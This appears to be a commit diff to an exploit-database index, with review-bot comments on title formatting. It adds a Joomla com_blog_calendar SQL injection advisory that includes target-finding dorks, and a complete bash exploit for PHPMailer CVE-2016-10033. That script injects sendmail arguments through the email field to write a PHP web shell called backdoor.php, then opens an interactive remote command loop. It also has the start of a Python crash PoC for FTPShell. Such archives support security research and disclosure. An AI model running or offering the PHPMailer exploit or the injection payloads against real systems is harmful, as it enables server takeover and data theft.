6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0
|
||||
6707,platforms/php/webapps/6707.txt,"GForge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0
|
||||
6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - 'skill_edit' Parameter SQL Injection",2008-10-09,beford,php,webapps,0
|
||||
6709,platforms/php/webapps/6709.txt,"Joomla! Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,php,webapps,0
|
||||
6710,platforms/php/webapps/6710.txt,"camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps,0
|
||||
6710,platforms/php/webapps/6710.txt,"Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps,0
|
||||
6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps,0
|
||||
6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - 'news.php id' SQL Injection",2008-10-09,"Hussin X",php,webapps,0
|
||||
6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - SQL Injection",2008-10-09,"Hussin X",php,webapps,0
|
||||
6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0
|
||||
6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure",2008-10-09,gnix,php,webapps,0
|
||||
6715,platforms/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0
|
||||
6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0
|
||||
6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - 'linkid' Parameter SQL Injection",2008-10-10,Crackers_Child,asp,webapps,0
|
||||
6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
|
||||
6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php faq' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
|
||||
6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
|
||||
6723,platforms/php/webapps/6723.txt,"Joomla! Component Ignite Gallery 0.8.3 - SQL Injection",2008-10-10,H!tm@N,php,webapps,0
|
||||
6724,platforms/php/webapps/6724.txt,"Joomla! Component mad4Joomla! - SQL Injection",2008-10-10,H!tm@N,php,webapps,0
|
||||
6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - (kat) SQL Injection",2008-10-10,LUPUS,asp,webapps,0
|
||||
6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' SQL Injection",2008-10-10,BeyazKurt,php,webapps,0
|
||||
6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - (redirect.php) Privilege Escalation",2008-10-10,StAkeR,php,webapps,0
|
||||
6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection",2008-10-11,H!tm@N,php,webapps,0
|
||||
6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - 'kat' Parameter SQL Injection",2008-10-10,LUPUS,asp,webapps,0
|
||||
6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' Parameter SQL Injection",2008-10-10,BeyazKurt,php,webapps,0
|
||||
6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation",2008-10-10,StAkeR,php,webapps,0
|
||||
6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' Parameter SQL Injection",2008-10-11,H!tm@N,php,webapps,0
|
||||
6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection",2008-10-11,Hakxer,asp,webapps,0
|
||||
6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - File Disclosure / Code Execution",2008-10-12,muuratsalo,php,webapps,0
|
||||
6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure",2008-10-12,GoLd_M,php,webapps,0
|
||||
6735,platforms/php/webapps/6735.php,"Globsy 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
|
||||
6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'index.php cat' SQL Injection",2008-10-12,Hakxer,php,webapps,0
|
||||
6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'cat' Parameter SQL Injection",2008-10-12,Hakxer,php,webapps,0
|
||||
6737,platforms/php/webapps/6737.txt,"LokiCMS 0.3.4 - 'index.php' Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0
|
||||
6739,platforms/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0
|
||||
6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,php,webapps,0
|
||||
6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution",2008-10-13,girex,php,webapps,0
|
||||
6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,php,webapps,0
|
||||
6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp id' SQL Injection",2008-10-13,"Hussin X",php,webapps,0
|
||||
6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0
|
||||
6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp' SQL Injection",2008-10-13,"Hussin X",php,webapps,0
|
||||
6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - 'parent_id' Parameter SQL Injection",2008-10-13,d3v1l,php,webapps,0
|
||||
6747,platforms/php/webapps/6747.php,"WordPress Plugin WP Comment Remix 1.4.3 - SQL Injection",2008-10-14,g30rg3_x,php,webapps,0
|
||||
6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - 'index.php no' SQL Injection",2008-10-14,EcHoLL,php,webapps,0
|
||||
6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - SQL Injection",2008-10-14,EcHoLL,php,webapps,0
|
||||
6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0
|
||||
6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
|
||||
6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
|
||||
6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'success_story.php id' SQL Injection",2008-10-14,Hakxer,php,webapps,0
|
||||
6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
|
||||
6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
|
||||
|
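Review bot: The row for 6745 keeps `php` in both the path and the platform column although both versions of its title name `links.asp`, so this retitle is the moment to check whether the entry belongs under `asp`. The same pass also drops locating detail from some titles: 6748 goes from `'index.php no' SQL Injection` to plain `SQL Injection` and 6751 loses `(IP)`, while 6754 (`'success_story.php id'`) is left in the old style. Suggest keeping the parameter for 6748 as `'no' Parameter`, in line with the 6736 and 6746 rewrites.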
@ -21181,7 +21183,7 @@ id,file,description,date,author,platform,type,port
|
|||
8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0
|
||||
8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - Local File Inclusion / SQL Injection",2009-06-15,SirGod,php,webapps,0
|
||||
8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 - Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0
|
||||
8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0
|
||||
8958,platforms/php/webapps/8958.txt,"TorrentTrader Classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0
|
||||
8959,platforms/php/webapps/8959.pl,"Joomla! Component com_iJoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0
|
||||
8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps,0
|
||||
8962,platforms/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - (listing_view.php itemnr) SQL Injection",2009-06-15,SirGod,php,webapps,0
|
||||
|
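Review bot: Only 8958 gets its product name capitalized; the neighboring rows `elvin bts 1.2.0` and `adaptweb 0.9.2` stay lower-case and 8962 still uses the old `(listing_view.php itemnr)` form. If the goal is consistent, searchable titles, normalize these in the same commit or state that the cleanup is incremental.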
@ -22709,7 +22711,7 @@ id,file,description,date,author,platform,type,port
|
|||
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - Cross-Site Request Forgery (Add Admin)",2010-03-26,bi0,php,webapps,0
|
||||
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite Module Jokes - SQL Injection",2010-03-26,Sc0rpi0n,php,webapps,0
|
||||
11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System 2 - Blind SQL Injection",2010-03-27,"Easy Laster",php,webapps,0
|
||||
11899,platforms/php/webapps/11899.html,"AdaptCMS Lite 1.5 2009-07-07 - Exploit",2010-03-27,ITSecTeam,php,webapps,0
|
||||
11899,platforms/php/webapps/11899.html,"AdaptCMS Lite 1.5 - Arbitrary Add Admin",2010-03-27,ITSecTeam,php,webapps,0
|
||||
11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multiple Local File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
|
||||
11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - Multiple File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
|
||||
11904,platforms/php/webapps/11904.txt,"68KB - Multiple Remote File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
|
||||
|
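Review bot: The new title for 11899 removes `2009-07-07`, which was the only detail in the row identifying the affected release beyond `1.5`. `Arbitrary Add Admin` also does not say which weakness class is involved, unlike 11896 above it (`Cross-Site Request Forgery (Add Admin)`); name the class if the advisory supports it, so the entry can be matched to a control.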
@ -31125,7 +31127,7 @@ id,file,description,date,author,platform,type,port
|
|||
30534,platforms/php/webapps/30534.txt,"PHPGedView 4.1 - 'login.php' Cross-Site Scripting",2007-08-27,"Joshua Morin",php,webapps,0
|
||||
30539,platforms/php/webapps/30539.txt,"ACG News 1.0 - 'index.php' Multiple SQL Injection",2007-08-28,SmOk3,php,webapps,0
|
||||
30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0
|
||||
30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0
|
||||
30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0
|
||||
30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750u ME_1.09 - Cross-Site Request Forgery",2013-12-28,"FIGHTERx war",hardware,webapps,0
|
||||
30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Inclusion",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
|
||||
31030,platforms/php/webapps/31030.pl,"WordPress Plugin SpamBam - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0
|
||||
|
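Review bot: 30541, one row above the retitled 30545, still reads `Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection`, with a stray `- /` and an unquoted `lang` parameter. It sits inside this hunk's context, so fix it in the same pass, for example by moving both product names before the dash and ending with `'lang' Parameter SQL Injection`.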
@ -31218,7 +31220,7 @@ id,file,description,date,author,platform,type,port
|
|||
30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0
|
||||
30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0
|
||||
30637,platforms/php/webapps/30637.js,"WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0
|
||||
30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
|
||||
30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
|
||||
30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
|
||||
30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0
|
||||
30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0
|
||||
|
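Review bot: Quoting `'Verify.php'` for 30638 leaves 30634 (`postComment.php Remote File Inclusion`) two rows up unquoted, so a search on the quoted-filename pattern will still miss it. Apply the same quoting to 30634.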
@ -32343,9 +32345,9 @@ id,file,description,date,author,platform,type,port
|
|||
32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0
|
||||
32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
|
||||
32422,platforms/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0
|
||||
32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x - 'j_username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x - 'Username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x - 'filter' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
|
||||
32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 - 'wholite.cgi' Cross-Site Scripting",2008-09-27,"Ghost Hacker",cgi,webapps,0
|
||||
32431,platforms/php/webapps/32431.txt,"Lyrics Script - 'search_results.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0
|
||||
|
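Review bot: The three OpenNMS rewrites (32423 to 32425) drop the endpoints `j_acegi_security_check`, `notification/list.jsp` and `event/list`, leaving only parameter names. Someone matching these entries against web server logs or filtering rules needs the path, and `'j_username'` and `'Username'` are now hard to tell apart. Suggest keeping the path in the title next to the quoted parameter.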
@ -34871,8 +34873,8 @@ id,file,description,date,author,platform,type,port
|
|||
36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0
|
||||
36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 - 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,php,webapps,0
|
||||
36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Parameter Cross-Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0
|
||||
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - DomainConfig.do Operation Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
|
||||
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - jsp/AddDC.jsp domainName Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
|
||||
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
|
||||
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
|
||||
36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0
|
||||
36671,platforms/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80
|
||||
36674,platforms/php/webapps/36674.txt,"WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80
|
||||
|
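Review bot: 36666 and 36667 lose their endpoints (`DomainConfig.do`, `jsp/AddDC.jsp`) in the new titles, so the two entries differ only by `'Operation'` versus `'domainName'`. Keep the page name in the title; it is what an administrator would search for when checking exposure.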
@ -36918,3 +36920,5 @@ id,file,description,date,author,platform,type,port
|
|||
40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
|
||||
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
|
||||
40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
|
||||
40966,platforms/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps,0
|
||||
40968,platforms/php/webapps/40968.sh,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0
|
||||
|
|
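Review bot: The new row 40968 is titled only `PHPMailer 5.2.17 - Remote Code Execution`, while the script added under that path identifies itself as `CVE-2016-10033`; carry the CVE in the index entry or its metadata so the row can be correlated with advisories and scanner output. Row 40966 is titled `Joomla! Component Blog Calendar`, but the advisory file uses the identifier `com_blog_calendar`, which is the string that appears in URLs; include it in the title.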
|
32
platforms/php/webapps/40966.txt
Executable file
|
@ -0,0 +1,32 @@
|
|||
==========================================================================================
|
||||
Joomla com_blog_calendar SQL Injection Vulnerability
|
||||
==========================================================================================
|
||||
|
||||
:-------------------------------------------------------------------------------------------------------------------------:
|
||||
: # Exploit Title : Joomla com_blog_calendar SQL Injection Vulnerability
|
||||
: # Date : 26th December 2016
|
||||
: # Author : X-Cisadane
|
||||
: # CMS Name : Joomla
|
||||
: # CMS Developer : http://joomlacode.org/gf/project/blog_calendar/
|
||||
: # Category : Web Application
|
||||
: # Vulnerability : SQL Injection
|
||||
: # Tested On : SQLMap 1.0.12.9#dev
|
||||
: # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan
|
||||
:-------------------------------------------------------------------------------------------------------------------------:
|
||||
|
||||
A SQL Injection Vulnerability has been discovered in the Joomla Module called com_blog_calendar.
|
||||
The Vulnerability is located in the index.php?option=com_blog_calendar&modid=xxx Parameter.
|
||||
Attackers are able to execute own SQL commands by usage of a GET Method Request with manipulated modid Value.
|
||||
Attackers are able to read Database information by execution of own SQL commands.
|
||||
|
||||
DORKS (How to find the target) :
|
||||
================================
|
||||
inurl:/index.php?option=com_blog_calendar
|
||||
Or use your own Google Dorks :)
|
||||
|
||||
Proof of Concept
|
||||
================
|
||||
|
||||
SQL Injection
|
||||
PoC :
|
||||
http://[Site]/[Path]/index.php?option=com_blog_calendar&modid=['SQLi]
|
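Review bot: The advisory never states which version of the component is affected: `Tested On` lists `SQLMap 1.0.12.9#dev`, which is the testing tool, not the target. It also calls `com_blog_calendar` a "Joomla Module" although the `option=com_...` parameter and the index title both say component. Ask the submitter for the affected version and the vendor notification or fix status before merging.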
27
platforms/php/webapps/40968.sh
Executable file
|
@ -0,0 +1,27 @@
|
|||
#!/bin/bash
|
||||
# CVE-2016-10033 exploit by opsxcq
|
||||
# https://github.com/opsxcq/exploit-CVE-2016-10033
|
||||
|
||||
echo '[+] CVE-2016-10033 exploit by opsxcq'
|
||||
|
||||
if [ -z "$1" ]
|
||||
then
|
||||
echo '[-] Please inform an host as parameter'
|
||||
exit -1
|
||||
fi
|
||||
|
||||
host=$1
|
||||
|
||||
echo '[+] Exploiting '$host
|
||||
|
||||
curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
|
||||
|
||||
cmd='whoami'
|
||||
while [ "$cmd" != 'exit' ]
|
||||
do
|
||||
echo '[+] Running '$cmd
|
||||
curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
|
||||
echo
|
||||
read -p 'RemoteShell> ' cmd
|
||||
done
|
||||
echo '[+] Exiting'
|
|
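Review bot: The header credits `opsxcq` and links that repository, but the index row for 40968 lists `Dawid Golunski` as author; record discoverer and PoC author separately or make the two agree. The header also gives no affected version and does not document that a run leaves `backdoor.php` in `/www` on the tested host. Both belong in the comments, since that file name and the `-OQueueDirectory=/tmp -X` string in the `email` field are what a defender would look for in a web root and in request logs.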
@ -1,4 +1,3 @@
|
|||
|
||||
Gforge <= 4.5.19 Multiple Sql Injections
|
||||
|
||||
Vendor Notified: 2008-10-06
|
||||
|
|
96
platforms/windows/dos/40965.py
Executable file
|
@ -0,0 +1,96 @@
|
|||
#Exploit FTPShell server 6.36 '.csv' Crash(PoC)
|
||||
#Author: albalawi_sultan
|
||||
#Tested on:win7
|
||||
#st :http://www.ftpshell.com/download.htm
|
||||
#1-open FTPShell Server Administrator
|
||||
#2-manage Ftp accounts
|
||||
#3-import from csv
|
||||
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
|
||||
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
|
||||
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
|
||||
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
|
||||
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
|
||||
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
|
||||
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
|
||||
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
|
||||
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
|
||||
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
|
||||
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
|
||||
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
|
||||
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
|
||||
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
|
||||
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
|
||||
